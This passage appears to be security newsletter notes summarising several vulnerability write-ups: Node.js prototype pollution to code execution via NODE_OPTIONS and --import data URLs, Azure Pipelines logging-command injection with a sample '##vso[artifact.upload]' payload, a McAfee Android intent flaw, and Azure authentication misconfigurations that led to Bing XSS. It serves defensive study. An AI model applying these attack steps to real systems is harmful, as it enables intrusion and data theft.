When using curl, if the --data-raw
argument starts with a @
it will be treated as a filename and the file itself will be included as the data of the request. This sort of bug would be hard to exploit in the context of Burp and Chrome, requiring a victim to “Copy as cURL” a malicious request in the first place, and then run it. But its also a chance to call out that feature of curl, might come in handy in some other exploit.
—–GPT—– The vulnerability writeup introduces a new exploitation technique for Server-Side Prototype Pollution (SSPP) using the –import command line flag in Node.js version 19.0.0 and above. This technique allows the execution of arbitrary JavaScript code without the need for any files on the filesystem. The attack works by specifying a data URL with the JavaScript code as a command line argument for –import. The Node.js developers considered this behavior to be “not an entrypoint security issue” and did not violate their threat model.
An example demonstrates how this technique can be used to gain access to the filesystem and system-based commands by importing Node.js modules. Using the –import flag with a data URL, the Node.js filesystem module is loaded, and a file is written to /tmp/pwnd with “pwnd” as its content. This technique can be tested in the “Remote code execution via server-side prototype pollution” lab.
Concise Point Form Summary:
Exploitation technique for Server-Side Prototype Pollution using --import command line flag in Node.js 19.0.0+
Executes arbitrary JavaScript code without filesystem requirement
Attack works by specifying data URL with JavaScript code as --import argument
Node.js developers consider this not a security issue
Example demonstrates filesystem access and system commands using imported Node.js modules
Testable in "Remote code execution via server-side prototype pollution" lab
Attack Strategy:
Use Server-Side Prototype Pollution to inject the NODE_OPTIONS property into the target object's prototype.
Set the NODE_OPTIONS value to use the --import flag with a data URL containing the arbitrary JavaScript code to be executed.
Trigger a sink function, such as fork(), which will use the injected NODE_OPTIONS and execute the arbitrary code.
A look at how logging attacker controlled data can be problematic in Azure Pipelines to potentially gain code execution and access to sensitive environment variables.
The authors explore the use of “logging commands” which are special terms that can be logged that can communicate with the agent running the pipeline. These can be used to for example mark a step as failed but can do other things also. The logging commands look something like the following:
##vso[area.action property=value;property2=value2;...]message
There are a variety of actions that might be useful to an attacker, two they explore are task.setvariable
, and artifact.upload
. The first is used in their dummy example case where they have a pipeline that downloads a file from a location from a pipeline variable, and executes it. So there is a clear path to RCE there. The second is used in a case study to exploit thescikit-learn
repository.
In the scikit-learn
repository the Pipeline will log the latest commit message from a pull request, so a malicious attacker, capable of getting a PR merged (you want it running inside their organization) can gain control over the scikit-learn artifacts with a commit message like:
##vso[artifact.upload]local file path
This particular scikit-learn attack feels somewhat unlikely, the commit message being something like that should raise questions to any human in the loop, but the general principal is something to keep in mind. All it takes is logging attacker data to potentially do some damage.
A fairly classic mobile issue, the McAfee Security: Antivirus VPN is a highly privileged app and it exports a fairly generic MainActivity
. The MainActivity
is rather dynamic in terms of what type content it’ll load, basically acting as a wrapper to load whatever the real intent was. Setting the first extra
to TRIGGER:MESSAGING
, it will then look for the SCREEN
extra and then craft an activity with any class and extras set in that field and launch it.
As this is a privileged application, an attacker could abuse that to craft a SCREEN
value that will try to launch privileged intents from within the McAfee application such as triggering a phone call. The nested intent will be called from the privileged context of the McAfee Security application.
At its core, we have a simple mistake that can be made pretty easily on all of the cloud platforms though this post focuses in on Azure App Services and Azure Functions. Being able to easily add authentication to your apps on either is nice, but they can easily be misconfigured. The added authentication only ensures the use can obtain/has presented a valid token, it is left to the application to actually validate the claims without that token. To ensure the user belong to the expected groups or has the right permissions. It is reasonably easy to add authentication but not take the extra steps to restrict it.
The authors, noticing this started scanning for Azure applications that require authentication, but do not validate the user has the appropriate claims. They discovered a number of vulnerability applications belonging to microsoft, from internal tools like Contract Center for manaing call center agents, COSMOS, a file manager with over 4 exabytes of data, and public facing Power Automate Blog’s WordPress admin panel.
The most impactful of these finds was the Bing Trivia app, despite its name it seems to manage some central aspects of Bing, importantly the Carousels section, which stores the carousels containing some search results. Like a search for best soundtracks
has a carousels at the top containing some highly recommended movie soundtracks. The authors were able to add the 1995 movie Hackers as the top result.
They were also able to obtain XSS here (no many details probably but given the level of access, probably fairly straight forward), and could use that to steal a user’s Office 365 token and access all their OneDrive files, Teams messages, Outlook emails, etc. Pretty crazy impact, but misconfigurations can do that to you.